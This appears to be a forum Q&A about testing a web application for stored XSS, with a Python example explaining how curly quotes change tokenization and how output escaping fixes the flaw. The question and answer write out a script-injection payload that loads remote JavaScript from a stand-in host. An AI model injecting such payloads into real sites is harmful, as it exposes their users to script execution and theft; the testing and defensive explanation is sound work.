
Web application crashing due to XSS script in IE but not in Google Chrome, but both browsers are processing the script?


I'm testing a web application against XSS attacks. In it there is a list of events and each one has a comment area; in one of the events, I inserted this script,

<script src=”http://www.example.com/malicious.js”></script >

The event showed a flag that there is a comment, but it is not getting displayed. The problem here is that whenever I click on that event, the app crashes, and the browser gives "Recover page".

But in Chrome, it is accepting that script, displays it as an empty comment (" "), and it's not getting crashed. Why?

I reset the browser settings in IE, but the same issue appears. So is that due to Chrome not processing the virus (not sure), or IE processing it?

And I tried this script,

<script >alert("Hello");</script > 

Both browsers act in the same way without crashing.

So can you please give me an idea of what's happening in it?


Solution

  • You appear to be using some non-standard quotation marks. Try replacing with this:

    <script src="http://www.example.com/malicious.js"></script>
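To see why the quotation marks matter, here is an added example (not part of the question or the answer) that runs the two forms of the comment through Python's standard-library html.parser as a stand-in tokenizer. It does not reproduce IE's or Chrome's engine; it shows that with U+201D quotes the quote characters are not attribute delimiters and end up inside the src value, and that HTML-escaping the stored comment before display leaves no script element at all, which is the fix a defender would apply regardless of how a given browser recovers from the odd markup. The inputs are constructed from the question's own comment and the answer's straight-quote form.

```python
"""Added example: how typographic quotes change the way a <script> tag is
tokenized, and how escaping the stored comment removes the tag entirely.
Uses Python's html.parser as a stand-in tokenizer; IE/Chrome internals differ."""
import html
from html.parser import HTMLParser

# Unicode quotes that look like " or ' but are not attribute delimiters in HTML
SMART_QUOTES = {"\u201c", "\u201d", "\u2018", "\u2019"}

# Constructed inputs: the comment posted in the question (with U+201D quotes)
# and the straight-quote form suggested in the answer.
CURLY_COMMENT = "<script src=\u201dhttp://www.example.com/malicious.js\u201d></script >"
STRAIGHT_COMMENT = '<script src="http://www.example.com/malicious.js"></script>'


class ScriptTagCollector(HTMLParser):
    """Records the attributes of every <script> start tag the tokenizer emits."""

    def __init__(self):
        super().__init__()
        self.script_tags = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags.append(dict(attrs))


def script_src_values(fragment):
    """Return the src attribute of each <script> start tag found in the fragment."""
    parser = ScriptTagCollector()
    parser.feed(fragment)
    parser.close()
    return [tag.get("src") for tag in parser.script_tags]


def find_smart_quotes(text):
    """Return the set of typographic quote characters present in the text.

    Useful when a test payload behaves differently from what was expected:
    a word processor or web form may have replaced " with U+201C/U+201D."""
    return {ch for ch in text if ch in SMART_QUOTES}


def escape_for_display(comment):
    """Defender's fix: escape the comment on output so it renders as text.

    After escaping, no browser sees a <script> element, so neither the
    execution nor the crash described in the question can occur."""
    return html.escape(comment, quote=True)


if __name__ == "__main__":
    # With curly quotes the quote characters become part of the URL value.
    print("curly    ->", script_src_values(CURLY_COMMENT))
    # With straight quotes the value is the bare URL.
    print("straight ->", script_src_values(STRAIGHT_COMMENT))
    # Escaped output contains no script tag at all.
    print("escaped  ->", script_src_values(escape_for_display(CURLY_COMMENT)))
    print("smart quotes in posted comment:", find_smart_quotes(CURLY_COMMENT))
```

Running the block prints the src value the tokenizer extracts for each form; the curly-quote version yields a value that still contains the U+201D characters, so whatever a browser does with it is error recovery rather than a normal script load, which is consistent with the two browsers behaving differently. The escaped form is what the comment area should emit when displaying user input.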